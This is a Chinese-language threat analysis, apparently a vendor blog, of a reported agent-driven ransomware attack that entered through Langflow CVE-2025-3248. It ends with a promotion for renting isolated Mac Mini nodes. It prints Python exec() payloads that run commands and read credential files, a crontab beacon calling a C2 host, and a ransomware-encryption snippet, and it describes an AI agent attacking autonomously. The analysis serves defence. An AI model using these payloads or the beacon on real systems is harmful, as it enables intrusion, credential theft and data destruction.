Sysdig 原始取证 · CVE-2025-3248 技术拆解 · 600+ payload 攻击链 · ATA 四条证据线 · Mac Mini M4 隔离验收清单
TL;DR:2026 年 7 月 1 日,云安全公司 Sysdig 威胁研究团队(TRT,报告作者 Michael Clark)首次公开披露代号 JADEPUFFER 的完整勒索操作——从踩点侦察、凭证窃取、横向移动、权限维持到破坏性加密与勒索信投递,全程由大语言模型 Agent 自主驱动,无人类在关键节点手动操作。Sysdig 将其定义为 Agentic Threat Actor(ATA,智能体威胁行为者)。入口是一台公网暴露的 Langflow 实例(CVE-2025-3248),真正目标是另一台暴露于公网的 MySQL + 阿里巴巴 Nacos 生产服务器;整场攻击捕获 超过 600 条有明确目的的 payload。本文包含:完整时间线、漏洞技术拆解、两阶段攻击链还原、四条自主性证据、比特币地址悬案、IOC 汇总、官方防御建议、行业反应、Sysdig 四点结论,以及为何部署 OpenClaw / Langflow 等 AI Agent 时应考虑租用隔离的 Mac Mini M4而非把编排服务器直接暴露公网。
自勒索软件成为威胁类别以来,键盘背后总有一个「人」——要么亲自操作,要么事先写好脚本。JADEPUFFER 打破了这个前提:Sysdig 评估这是目前已知第一例端到端、完全由大语言模型驱动的完整勒索操作。
| 维度 | 详情 |
|---|---|
| 发现方 | Sysdig 威胁研究团队(TRT),报告作者 Michael Clark(Director of Threat Research) |
| 发布时间 | 2026 年 7 月 1 日(Dark Reading、BleepingComputer 等 7 月 2–6 日跟进,外界常以「7 月 6 日」为公众认知节点) |
| 攻击者代号 | JADEPUFFER(Sysdig 官方全大写命名) |
| 新分类 | ATA(Agentic Threat Actor)——攻击能力由 AI Agent 交付,而非人工驱动的工具集 |
| 入口机 | 公网暴露的 Langflow 实例(CVE-2025-3248) |
| 真正目标 | 另一台公网暴露、运行 MySQL + 阿里巴巴 Nacos 的生产服务器 |
| 规模 | 超过 600 条独立、有明确目的的 payload,压缩时间窗口内执行完毕 |
AI 编排服务器常存 API Key:Langflow 这类 Agent 工作流服务器的环境变量里往往放着 OpenAI、Anthropic、DeepSeek、Gemini 及阿里云/腾讯云凭证——正是 JADEPUFFER 第一阶段并行扫描的目标。
仓促上线、直接暴露公网:很多团队为快速验证原型,把 Langflow / OpenClaw Gateway 直接挂在公网 IP 上,没有访问控制。
老漏洞 + 自动化武器化:CVE-2025-3248 早在 2025 年 4 月披露、5 月进 CISA KEV;Agent 让「把历史漏洞库挨个喷一遍」的成本趋近于零。
LLMjacking 边际成本为零:若攻击者本身靠窃取的模型/云凭证驱动 Agent,发起多阶段攻击的经济门槛极低。
| 时间 | 事件 |
|---|---|
| 2025 年 4 月 | Langflow 曝出 CVE-2025-3248(未鉴权代码注入 / RCE) |
| 2025 年 5 月 5 日 | CISA 列入「已知被利用漏洞」(KEV)目录 |
| 2025 年 | 同一漏洞被用于投递 Flodrix 僵尸网络(Trend Micro 独立披露,与 JADEPUFFER 无关但说明漏洞长期被公网扫描利用) |
| 2026 年 6 月 | JADEPUFFER 对公网 Langflow 发起攻击,完整攻击链在数周内分多个会话执行 |
| 2026 年 7 月 1 日 | Sysdig 发布完整技术报告 |
| 2026 年 7 月 2–6 日 | Dark Reading、BleepingComputer、CyberScoop、CSO Online、Security Affairs 等跟进报道 |
| 项目 | 详情 |
|---|---|
| 组件 | Langflow —— 开源可视化 AI Agent 工作流框架,GitHub 星标 7 万+ |
| 漏洞类型 | CWE-94(代码注入)+ CWE-306(关键功能缺失身份验证) |
| CVSS | 9.8(Critical),向量 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 影响版本 | Langflow 1.3.0 之前所有版本 |
| 漏洞位置 | /api/v1/validate/code 接口 |
| 修复版本 | 1.3.0(新增身份校验) |
| EPSS 被利用概率 | 91.42%(SentinelOne 数据) |
成因五步拆解:
Langflow 提供「代码校验」接口,让用户在可视化编排里写自定义函数节点时提前校验语法。
实现方式:用户代码 → ast.parse() → compile() → exec() 执行。
关键缺陷:完全没有身份认证,也没有任何沙箱隔离。
利用技巧:Python 装饰器与参数默认值在函数定义时立即求值;攻击者把恶意代码写进默认参数或装饰器,一旦 Langflow 拿去「校验」,代码已在服务器执行。
攻击者无需登录、无需权限,只需一个精心构造的 HTTP POST 即可 RCE。
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("cat /root/.bash_history", shell=True))')重要区分:Flodrix 僵尸网络与 JADEPUFFER 是两起独立利用活动,共享同一漏洞入口。前者是传统脚本化投递;后者才是 Sysdig 披露的「AI Agent 自主驱动」勒索。
官方补丁(1.3.0):为 post_validate_code 新增 _current_user: CurrentActiveUser 依赖注入;FastAPI 先校验 JWT Bearer Token 或 x-api-key,失败直接 401/403,请求不会到达漏洞逻辑。
Sysdig 指出 Langflow 成为「有吸引力入口」的原因:环境变量常存大模型 API Key 与云凭证;很多团队仓促上线、缺乏网络访问控制。
全部 payload 以 Base64 编码 Python 通过 Langflow RCE 端点投递。
执行 id、uname -a、hostname 等基础枚举,并行扫描:OpenAI / Anthropic / DeepSeek / Gemini API Key;ALIBABA_、ALIYUN_、TENCENT_、HUAWEI_ 及 AWS/GCP/Azure 凭证;加密货币钱包与助记词;数据库凭证与配置文件。
导出 Langflow 自身 PostgreSQL 后端数据库,窃取凭证、API Key 与用户记录,暂存本地审阅后删除(清理痕迹)。
扫描内网地址空间与具名服务,用默认凭证探测数据库、对象存储、密钥库与服务发现端点。
探测 minio.internal:9000 与 127.0.0.1:9000,用默认凭证 minioadmin:minioadmin 走完枚举;发现含 terraform-state 的 bucket 后定向提取 credentials.json。自适应细节:第一次请求带 ?format=json 却收到 XML,下一条 payload 立即改用 XML 解析器重试——典型的「探测-遇错-自适应」闭环。
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"真正目标是另一台同样暴露公网、运行 MySQL 与阿里巴巴 Nacos 的生产服务器。Nacos 有鉴权绕过历史(CVE-2021-29441 及相关变种),且默认 JWT 签名密钥自 2020 年起被公开文档记录,许多部署至今未更换。
Agent 用 root 凭证直接连接暴露的 MySQL 端口——这组凭证来源不明,Sysdig 未观察到从受害者环境窃取,可能是少数「人类预先准备」环节之一。
| 时间(UTC) | 动作 |
|---|---|
| 19:34:24 | 生成 bcrypt 哈希,插入 xadmin 及管理员角色 |
| 19:34:36 | 尝试 xadmin:Xploit@2026# 登录,失败 |
| 19:34:48 | 12 秒后并行测试 nacos:nacos 默认凭证并重新生成更简单密码哈希 |
| 19:35:07 | 放弃 subprocess.run,改用 import bcrypt,删除损坏记录后重建 |
| 19:35:18 | 登录成功——总耗时 31 秒 |
利用 MySQL INTO OUTFILE / LOAD_FILE 测试写入、读回、/var/run/docker.sock、/proc/1/cgroup、/etc/hostname 及 UDF 提权路径。进入勒索前主动写「完成标记」——Sysdig 指出这更像 Agent 完成任务后发出进入下一阶段的信号,而非固定脚本行为。
将全部 1,342 条 Nacos 服务配置项用 MySQL AES_ENCRYPT() 加密,删除原始 config_info 与 his_config_info,创建勒索信表 README_RANSOM。
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY) # 仅打印一次,从未存储或外传
# 创建 config_info_enc → DROP config_info → CREATE README_RANSOM
# 比特币: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy
# 联系: e78393397[@]proton[.]me关键细节:勒索信声称 AES-256,但 MySQL AES_ENCRYPT() 默认实为 AES-128-ECB;加密密钥随机生成、只打印到 stdout、从未存储或传输——即便付款也无法恢复。两分钟后 Agent 又发出 payload 把数字精修为「全部 1342 项已加密」。
升级到直接 DROP DATABASE,代码注释自述「高 ROI 数据库,已备份至 64.20.53[.]230」——Sysdig 无独立证据证实数据真的回传。一条 DROP DATABASE 因外键约束静默失败后,下一条 payload 自动加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——修复要求「理解为什么失败」,而非无脑重试。
自我叙事的代码:payload 里充斥自然语言注释,解释每一步「为什么」——包括 ROI 排序、指出「哪个数据库最大」。这些注释原生存在于攻击者代码,非研究人员事后推断。
机器速度的故障诊断与修正:Nacos 后门 31 秒修复是最典型例子;MinIO XML/JSON 自适应、JWT 路径遇阻即放弃,模式反复出现。
对自然语言上下文的理解:解析目标环境中自由文本并采取「只有读懂才会做」的动作,在相隔数周的不同会话中反复出现。
比特币地址悬案:见下一节——两种解读均无法排除,体现 AI 自主性给溯源带来的新不确定性。
结合「600+ 条 payload 在压缩窗口内连贯执行」,Sysdig 认为证据指向自主运作的 Agent,而非人工或固定工具集。
勒索信比特币地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 是比特币开发者文档与 Bitcoin Core 仓库里反复使用的标准 P2SH 格式示例地址,大量存在于大模型训练语料中。
链上数据:历史 737 笔已确认交易,累计约 46 枚比特币,当前余额为零(每笔存入立刻转走)。
Sysdig 两种无法区分的解读:(a) LLM 在训练数据基础上「幻觉」生成,钱包属第三方专门「打扫」误转存款;(b) 攻击者确实配置了真实可控钱包,只是恰好与文档示例重合。研究团队无法看到 JADEPUFFER 的 system prompt,两种可能性目前均无法排除。
| 类型 | 指标 |
|---|---|
| C2 / 信标 | 45.131.66[.]106;crontab 信标 hxxp://45.131.66[.]106:4444/beacon |
| 数据暂存/外泄(未证实) | 64.20.53[.]230(InterServer,AS19318) |
| 入口漏洞 | CVE-2025-3248 |
| 勒索比特币 | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| 勒索邮箱 | e78393397[@]proton[.]me(威胁情报库无命中,格式与已知 MySQL 勒索团伙惯用联系方式不同) |
| 勒索表名 | README_RANSOM(与 WARNING、RECOVER_YOUR_DATA 等已知表名均不匹配) |
| 持久化 | crontab 每 30 分钟向 C2 4444 端口信标外联 |
Sysdig 特别指出:勒索邮箱与表名看似符合人类勒索惯例,实则查无先例,进一步支持「全新、Agent 驱动」而非已知团伙常规套路。
将 Langflow 升级到修复 CVE-2025-3248 的版本;不要把代码执行/校验类端点暴露在公网。
使用运行时威胁检测,识别数据库进程中的恶意行为。
不要让 AI 编排服务器运行环境里存放大模型 API Key 或云凭证——密钥托管到专门服务,与可被公网访问的进程隔离。
加固 Nacos:更换默认 token.secret.key,升级强制自定义密钥版本;永远不要把 Nacos 暴露公网,勿以 root 连接后端数据库。
永远不要把数据库管理员账号暴露在公网;管理端口强制强唯一凭证与来源 IP 限制。
对外施加出站流量控制(egress control),防止被攻陷主机任意信标外联或访问外部暂存服务器。
监控上述 IOC;关注调用外网请求的计划任务与括号包裹的 User-Agent 异常等特征。
BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等第一时间跟进,普遍称其为「首例完全由 AI 驱动的勒索攻击」,强调 ATA 时代到来。
「我更倾向于把这看作是『执行方式上的演进』,而不是一种全新的勒索技术。区别在于这次 AI Agent 能把侦察、凭证窃取和部署自主串联起来。」—— 独立安全研究员 Vibhum Dubey(CSO Online 采访)
Dubey 同时指出:真正值得担心的不是最后的加密阶段,而是加密之前那段「安静期」——Agent 悄悄摸清身份体系、权限与信任链条,同时规避被发现;某条路被拦会迅速切换战术,每次入侵表现形式都可能略有不同。
多家媒体提到 LLMjacking:攻击者靠窃取凭证驱动 Agent,复杂多阶段攻击的边际成本趋近于零。
勒索软件不再是「高技能者的手艺」:LLM Agent 可串联侦察、窃取、横向移动、持久化与破坏,操作者无需深厚专业知识。
老漏洞正在被自动化武器化:下游目标利用 2021 年 Nacos 问题与从未更换的默认密钥;Agent 让「历史漏洞库挨个喷」成本几乎为零。
意图变得「可读」——也是防守方机会:LLM 在 payload 里叙述目标,客观上提供此前不曾有的检测与研判抓手。
「已备份」只是 Agent 自述:加密密钥临时生成且不可恢复,即便付款配置数据也无法找回。
报告结尾强调:用到的每一项单独技术都不新、不复杂;真正值得关注的是 AI 模型把这些技术串成完整勒索操作,针对本就被忽视的公网基础设施。运行勒索软件的技能门槛已降到「运行一个 Agent 的成本」。
JADEPUFFER 的受害者画像很清晰:把 Langflow 直接暴露公网、环境变量里塞满 API Key、生产 MySQL/Nacos 同样裸露。对要在 macOS 上跑 OpenClaw、Langflow 或 Hermes Agent 的开发者,「买一台 Mac mini 自己挂公网」与「租用隔离远程 Mac」需要重新算账——尤其在苹果 2026 年 6 月涨价后(参见站内 Mac Mini M4 租 vs 买)。
| 维度 | 自购 Mac + 自托管暴露公网 | 租用 VNCMac Mac Mini M4(隔离节点) |
|---|---|---|
| 初始成本 | 涨价后基础款 ¥5,999+,含 AppleCare/电费/公网 IP | 按天 ¥30–50 / 按月 ¥600–900,随用随停 |
| 暴露面 | 需自行配置防火墙、反代、证书;易误把 Gateway/validate 端点挂公网 | 供应商侧网络隔离;你通过 SSH/VNC 接入,默认不鼓励把 Agent 控制台裸露公网 |
| API Key 管理 | 常写进 .env / 环境变量(JADEPUFFER 第一阶段重点扫描目标) | 可配合 SecretRef / 密钥托管;项目结束换节点即清环境 |
| 图形化验收 | 本地操作 | VNC 核对 OpenClaw 授权弹窗、Gateway 控制台、macOS 隐私权限(参见站内 OpenClaw 图形化授权) |
| 出站控制 | 需自建 egress 策略 | 可结合帮助页 SSH 隧道,减少盲目公网信标 |
| 事故后处置 | 主力机被污染、密钥泄露面大 | 停租 / 换节点,物理隔离节点不拖累本地 Windows 主力机 |
开通隔离节点:选择 Mac Mini M4 套餐,不要把 OpenClaw Gateway(18789)或 Langflow validate 端点直接映射到公网;需要外网访问时走 Nginx/Caddy 反代 + HTTPS(参见站内 Gateway 公网反代)。
升级与补丁:Langflow ≥ 1.3.0;Nacos 更换默认 JWT 密钥;数据库禁止 root 公网可达。
密钥不进环境变量:大模型 API Key 用密钥管理服务或 OpenClaw SecretRef,与可被 RCE 的进程隔离。
VNC 图形验收:在远程桌面核对 Gateway 控制台、插件审批(/approve)、macOS 屏幕录制/辅助功能权限;SSH-only 无法完成的步骤必须开 VNC。
出站与 IOC 监控:限制被攻陷主机对外信标;关注 crontab 外联与 README_RANSOM 等 IOC;项目结束导出备份后停租。
不是。两者都利用 CVE-2025-3248,但 Flodrix 是传统脚本化僵尸网络投递;JADEPUFFER 才是 Sysdig 披露的 AI Agent 自主勒索。
不能。密钥由 uuid4() 随机生成,仅打印到 stdout,攻击者自己也拿不出可用密钥;数据已实质性永久丢失。
风险逻辑相同:公网暴露 + 环境变量存密钥 + 未加固依赖服务。请升级依赖、限制出站、用 VNC 在隔离远程 Mac 上部署并验收,勿把 Gateway 裸奔公网。
Sysdig 与多家媒体认为,随着 Agent 工具成熟,此类攻击数量与覆盖面只会上升;公网应用服务器、未加固配置中心、公网数据库管理员账号将是最先被盯上的攻击面。
OpenClaw / Claude Code 等大量步骤需要 macOS 图形权限与扫码授权,Linux 无桌面无法完成;租用物理 Mac + VNC 可在隔离环境跑通全流程,又不必自购涨价后的硬件。参见站内 Linux 无桌面 vs Mac+VNC。
Sysdig《JADEPUFFER: Agentic ransomware for automated database extortion》;BleepingComputer;Dark Reading;CyberScoop;CSO Online(Vibhum Dubey);Security Affairs;Trend Micro(CVE-2025-3248 / Flodrix);NVD / SentinelOne / Zscaler;CISA KEV 目录。
JADEPUFFER 是一记警钟:AI Agent 让「侦察 → 窃取 → 横向移动 → 加密勒索」的门槛降到运行一个模型所需的成本,而受害者往往是本就被忽视的公网基础设施。对要在 macOS 上部署 OpenClaw、Langflow 或本地 Agent 的开发者,自购 Mac mini 再自行暴露公网,隐性风险(密钥泄露、补丁滞后、出站失控)在 ATA 时代被成倍放大。
租用 VNCMac 的 Mac Mini M4 隔离节点,通过 VNC 完成 Gateway 与系统权限验收,密钥不进环境变量、项目结束即停租——比把 AI 编排服务器挂在自家公网 IP 上更可控。查看 Mac Mini M4 套餐 与帮助页 SSH-VNC 说明即可开通。